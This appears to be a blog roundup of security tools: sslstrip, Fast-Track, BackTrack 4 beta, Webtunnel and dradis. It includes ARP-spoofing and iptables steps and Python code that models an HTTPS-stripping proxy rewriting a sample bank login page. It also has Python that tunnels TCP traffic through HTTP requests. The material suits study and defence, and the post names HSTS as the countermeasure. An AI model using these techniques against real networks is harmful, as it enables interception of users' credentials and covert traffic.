SSLstrip – HTTPS Stripping Attack Tool

This tool provides a demonstration of the HTTPS stripping attacks that were presented at Black Hat DC 2009. It will transparently hijack HTTP traffic on a network, watch for HTTPS links and redirects, then map those links into either look-alike HTTP links or homograph-similar HTTPS links. It also supports modes for supplying a favicon which looks like a lock icon, selective logging, and session denial. For more information on the attack, see the video from the presentation on the homepage.

To get this running:

  • Flip your machine into IP forwarding mode.
  • Set up iptables to redirect HTTP traffic to sslstrip.
  • Run sslstrip.
  • Run arpspoof so that the hosts on the network send their traffic to you.

That should do it.

How does this work?

First, arpspoof convinces a host that our MAC address is the router’s MAC address, and the target begins to send us all its network traffic. The kernel forwards everything along except for traffic destined to port 80, which the iptables rule redirects to $listenPort (10000, for example).

At this point sslstrip receives the traffic, rewrites the HTTPS links and redirects in the responses into plain HTTP ones, and fetches the real HTTPS resource on the victim’s behalf whenever one of those rewritten links is requested.
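To make that last step concrete, here is an added example, written for this post and not taken from sslstrip’s own source, of the link rewriting and bookkeeping an HTTPS-stripping proxy does once the forwarding and iptables steps above have delivered the victim’s port-80 traffic to it. The victim address, host names, sample response and the per-client map of stripped links are assumptions of this illustration:

```python
"""Model of the link-stripping step of an sslstrip-style proxy.

Illustrative code written for this post, not sslstrip's source. Assumed
setup: the victim's HTTP traffic is already redirected to the proxy (the
forwarding + iptables steps), the proxy fetches the real resource upstream
and rewrites the response before relaying it back over plain HTTP.
"""
import re
from urllib.parse import urlsplit

# Absolute https:// URLs as they appear in HTML attributes, scripts and headers.
SECURE_URL = re.compile(rb"https://[^\s\"'<>]+", re.IGNORECASE)


class StrippedLinkMap:
    """Per-client memory of which http:// URLs stand in for https:// ones.

    When the victim later requests one of these over plain HTTP, the proxy
    must fetch the original https:// URL upstream so the page keeps working."""

    def __init__(self):
        self._links = {}

    @staticmethod
    def _key(client_ip, url):
        p = urlsplit(url)
        return (client_ip, p.netloc.lower(), p.path or "/", p.query)

    def record(self, client_ip, secure_url):
        self._links[self._key(client_ip, secure_url)] = secure_url

    def upstream_url(self, client_ip, host, target):
        """Return the https:// URL to fetch for this plain request, or None if
        the client reached the URL on its own and plain HTTP upstream is right."""
        return self._links.get(self._key(client_ip, "http://" + host + target))


def strip_secure_links(client_ip, data, link_map):
    """Rewrite every https:// URL in `data` (bytes) to http:// and remember it."""
    def swap(match):
        link_map.record(client_ip, match.group(0).decode("latin-1"))
        return b"http://" + match.group(0)[len(b"https://"):]
    return SECURE_URL.sub(swap, data)


def rewrite_response(client_ip, headers, body, link_map):
    """Strip a Location redirect and the body, then recompute Content-Length
    (each rewritten link is one byte shorter). `headers` is a list of
    (name, value) str pairs; `body` is bytes."""
    out = []
    for name, value in headers:
        lname = name.lower()
        if lname == "location":
            value = strip_secure_links(client_ip, value.encode("latin-1"),
                                       link_map).decode("latin-1")
        elif lname == "content-length":
            continue  # recomputed below
        out.append((name, value))
    new_body = strip_secure_links(client_ip, body, link_map)
    out.append(("Content-Length", str(len(new_body))))
    return out, new_body


# Constructed sample response from the upstream HTTPS server (assumed values).
VICTIM = "10.0.0.5"
SAMPLE_HEADERS = [
    ("Content-Type", "text/html"),
    ("Location", "https://bank.example/account"),
    ("Content-Length", "999"),
]
SAMPLE_BODY = (b'<a href="https://bank.example/login">Log in</a>\n'
               b'<form action="https://bank.example/login" method="post">')


def demo():
    links = StrippedLinkMap()
    headers, body = rewrite_response(VICTIM, SAMPLE_HEADERS, SAMPLE_BODY, links)
    return links, headers, body


if __name__ == "__main__":
    links, headers, body = demo()
    print(dict(headers)["Location"])
    print(body.decode())
    print(links.upstream_url(VICTIM, "bank.example", "/login"))
```

Because the victim only ever speaks plain HTTP to the proxy, the proxy has to remember which URLs it stripped so that it fetches the original https:// resource upstream; otherwise the rewritten page breaks and the victim notices. Browsers that enforce HTTP Strict Transport Security (RFC 6797) for a host refuse to follow the stripped http:// link, which is the defence that has since blunted this attack.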

You can download sslstrip 0.2 here:

sslstrip-0.2.tar.gz

Or read more here.

Fast-Track 4.0 – Automated Penetration Testing Suite

The latest big buzz is Fast-Track, released recently at ShmooCon by SecureState. Put simply, Fast-Track is an automated penetration suite for penetration testers.

For those of you new to Fast-Track, it is a Python-based open-source project aimed at helping penetration testers identify, exploit, and further penetrate a network. Fast-Track was originally conceived when David Kennedy was on a penetration test and found that there was generally a lack of tools or automation for certain attacks that were normally extremely advanced and time consuming.

In an effort to reproduce some of David’s advanced attacks and pass them down to the team at SecureState, David ended up writing Fast-Track and releasing it to the public. Many of the issues Fast-Track exploits stem from improper sanitization of client-supplied data within web applications, poor patch management, or a lack of hardening. All of these are relatively simple to fix if you know what to look for, but they are extremely common findings for penetration testers.

Fast-Track arms the penetration tester with advanced attacks that in most cases have never been performed before. Sit back, relax, crack open a can of Jolt Cola and enjoy the ride.

It’s something a lot of people will enjoy: many parts of a pen-test are monotonous and don’t need your full concentration, and a semi-automated approach with a skilled eye watching for false positives and false negatives is more effective and efficient than either fully manual or fully automated testing.

Dependencies – Metasploit 3, SQLite, pymssql, FreeTDS, Pexpect, ClientForm, Beautiful Soup, and Psyco.

Installation – After extracting the tarball, run python setup.py install. This installs the needed dependencies except SQLite and Metasploit 3; you should specify the Metasploit path, otherwise the installer defaults to the BackTrack 3 installation. Once the installation completes, Fast-Track should be fully functional.

You can download Fast-Track 4.0 here:

fasttrack.tgz

Or read more here.

BackTrack BETA 4

The Remote Exploit Development Team is happy to announce the release of BackTrack 4 Beta. This version brings some conceptual changes and some new and exciting features. The most significant change is the expansion from a pentesting LiveCD towards a full-blown “distribution”.

Now based on Debian core packages and using the Ubuntu software repositories, BackTrack 4 can be upgraded in place as updates are released. When syncing with the BackTrack repositories, you will regularly get security tool updates soon after they are released.

If you don’t know what BackTrack is: it’s the result of merging the two innovative penetration testing live Linux distributions Auditor and WHAX. BackTrack provides a thorough pentesting environment which is bootable via CD, USB or the network (PXE). The tools are arranged in an intuitive manner and cover most attack vectors. Complex setups are simplified, such as automatic Kismet configuration, one-click Snort setup and precompiled Metasploit lorcon modules. BackTrack has been dubbed the #1 Security Live CD by Insecure.org, and #36 overall.

New Features

  • Kernel 2.6.28.1 with better hardware support.
  • Native support for Pico e12 and e16 cards is now fully functional, making BackTrack the first pentesting distro to fully utilize these awesome tiny machines.
  • Support for PXE Boot – Boot BackTrack over the network with PXE supported cards!
  • SAINT EXPLOIT – kindly provided by SAINT corporation for our users with a limited number of free IPs.
  • MALTEGO – The guys over at Paterva did outstanding work with Maltego 2.0.2 – which is featured in BackTrack as a community edition.
  • The latest mac80211 wireless injection patches are applied, with several custom patches for rtl8187 injection speed enhancements. Wireless injection support has never been so broad and functional.
  • Unicornscan – Fully functional with PostgreSQL logging support and a web front end.
  • RFID support
  • Pyrit CUDA support…
  • New and updated tools – the list is endless!

This BETA release is considered stable and usable. Some tools were held back from this version and will soon be added to the repositories. Some minor bugs have been discovered and will be fixed with updated packages.

It would also be appreciated if you could use this latest release and give feedback to the development team to improve it and ensure it works with your specific hardware configuration (especially the wireless features).

You can download BackTrack BETA 4 here:

DVD ISO Image – bt4-beta.iso
VMware Image – bt4-beta-vm-6.5.1.rar

Or read more here.

Webtunnel 0.0.2 – HTTP Encapsulation and Tunnel Tool

Webtunnel is a network utility that encapsulates arbitrary data in HTTP and transmits it through a web server. In that regard it is similar to httptunnel; however, it has several important differences: its server component runs in the context of a web server as a CGI application (with optional FastCGI support), so it does not need its own port and supports most things the web server supports, such as authentication, HTTP 1.1, HTTPS, and client certificates; it uses simple requests and responses, so it works seamlessly through forward and reverse proxies; and it is multi-threaded (actually multi-process, using sockets for inter-process communication) to allow multiple parallel connections to multiple destinations simultaneously.

It’s written in Perl and currently supports the tunneling of TCP connections. Future plans include implementations in different languages, mixed tunneling of UDP and pipes (so you can tunnel directly to a shell etc.), configuration features such as access control lists, and transmission options like compression and encryption.
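As an added example that does not reproduce webtunnel’s own code or wire format, the following Python models the encapsulation described above: each chunk of a TCP stream rides in the body of an ordinary POST to a CGI path, the response body carries the destination’s reply, and tunnel-id and sequence headers let the server side reassemble the stream even when proxies or parallel connections deliver requests out of order. The header names, the CGI path, the destination address and the echo “destination” standing in for a real TCP service are assumptions made for this illustration:

```python
"""Minimal model of tunnelling a TCP byte stream inside plain HTTP
request/response pairs. Constructed for this post; header names, the CGI
path and the echo destination are assumptions, not webtunnel's protocol."""
import itertools

CRLF = b"\r\n"


def build_message(start_line, headers, body):
    """Serialise an HTTP/1.1 message; an explicit Content-Length keeps it
    acceptable to forward and reverse proxies."""
    lines = [start_line.encode()] + [f"{k}: {v}".encode() for k, v in headers]
    lines.append(f"Content-Length: {len(body)}".encode())
    return CRLF.join(lines) + CRLF + CRLF + body


def parse_message(raw):
    """Split a serialised message into (start_line, {lower-header: value}, body)."""
    head, _, rest = raw.partition(CRLF + CRLF)
    start, *hdr_lines = head.decode("latin-1").split("\r\n")
    headers = {}
    for line in hdr_lines:
        k, _, v = line.partition(":")
        headers[k.strip().lower()] = v.strip()
    return start, headers, rest[:int(headers.get("content-length", "0"))]


class TunnelClient:
    """Client side: wraps outbound bytes of one TCP connection into POSTs."""

    def __init__(self, cgi_path, dest_host, dest_port, tunnel_id):
        self.cgi_path, self.tunnel_id = cgi_path, tunnel_id
        self.dest = f"{dest_host}:{dest_port}"
        self.seq = itertools.count()  # sequence number per request

    def wrap(self, data):
        headers = [("Host", "www.example.org"),           # assumed web server
                   ("X-Tunnel-Id", self.tunnel_id),      # assumed header names
                   ("X-Tunnel-Seq", str(next(self.seq))),
                   ("X-Tunnel-Dest", self.dest),
                   ("Content-Type", "application/octet-stream")]
        return build_message(f"POST {self.cgi_path} HTTP/1.1", headers, data)

    @staticmethod
    def unwrap(raw_response):
        """Return the destination's bytes carried in the response body."""
        start, _, body = parse_message(raw_response)
        if not start.startswith("HTTP/1.1 200"):
            raise ValueError(start)
        return body


class TunnelServer:
    """CGI side: one session per tunnel id; delivers request bodies to the
    destination in sequence order and returns its output in the response."""

    def __init__(self, connect):
        self.connect = connect  # connect(host, port) -> object with send(bytes) -> bytes
        self.sessions = {}

    def handle(self, raw_request):
        _, headers, body = parse_message(raw_request)
        tid, seq = headers["x-tunnel-id"], int(headers["x-tunnel-seq"])
        if tid not in self.sessions:
            host, port = headers["x-tunnel-dest"].rsplit(":", 1)
            self.sessions[tid] = {"conn": self.connect(host, int(port)),
                                  "next": 0, "pending": {}}
        s = self.sessions[tid]
        s["pending"][seq] = body
        out = b""
        # Deliver strictly in order: proxies and parallel connections may reorder.
        while s["next"] in s["pending"]:
            out += s["conn"].send(s["pending"].pop(s["next"]))
            s["next"] += 1
        return build_message("HTTP/1.1 200 OK",
                             [("Content-Type", "application/octet-stream")], out)


class EchoService:
    """Stand-in for the real TCP destination (constructed): answers every
    write with a tagged echo so the round trip is visible."""

    def __init__(self, host, port):
        self.tag = f"[{host}:{port}] ".encode()

    def send(self, data):
        return self.tag + data


def demo():
    client = TunnelClient("/cgi-bin/webtunnel.cgi", "10.0.0.7", 22, "a1b2c3")
    server = TunnelServer(EchoService)
    reqs = [client.wrap(b"SSH-2.0-OpenSSH\r\n"), client.wrap(b"second chunk")]
    late = server.handle(reqs[1])   # seq 1 arrives first: buffered, nothing back
    early = server.handle(reqs[0])  # seq 0 arrives: both delivered in order
    return TunnelClient.unwrap(late), TunnelClient.unwrap(early)


if __name__ == "__main__":
    print(demo())
```

A real tunnel also has to poll for downstream data when the client has nothing to send, which is why such traffic shows up as a steady stream of small POSTs to one path; from the web server’s point of view, though, it is just another CGI script, which is what lets it inherit the server’s authentication, HTTPS and client-certificate handling.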

You can download Webtunnel 0.0.2 here:

webtunnel-0.0.2.tgz

Or read more here.

dradis v2.0 – Open Source Security Reporting Tool

This is more of a tool for the information security professional amongst us, those working in a team carrying out web application audits, penetration tests and vulnerability assessments.

It’s useful for a team to use a tool like dradis so everyone is on the same page and the progress and segregation of responsibility can easily be seen.

Basically speaking, dradis is an open source tool for sharing information during security assessments. It provides a centralized repository of information to keep track of what has been done so far, and what is still ahead.

It’s a web application using a client/server architecture with an easy to use web interface. If you still aren’t sure what that means you can view a flash demo of the application in action here.

This application is suited to people on lengthy engagements, where it’s very useful to have all the information in one place. It’s also good to have if your team changes (i.e. someone joins halfway through), as it helps bring them up to speed.

The app is flexible, you don’t need to adapt your methodology to use it. It provides a web service interface so you can connect it with your existing vulnerability database or reporting tool.

The changelog for the latest version can be found here.

You can download dradis v2.0 here:

One click installer for Windows – dradis-v2.0-setup.exe
Platform independent source – dradis-v2.0.0.tar.gz

Or read more here.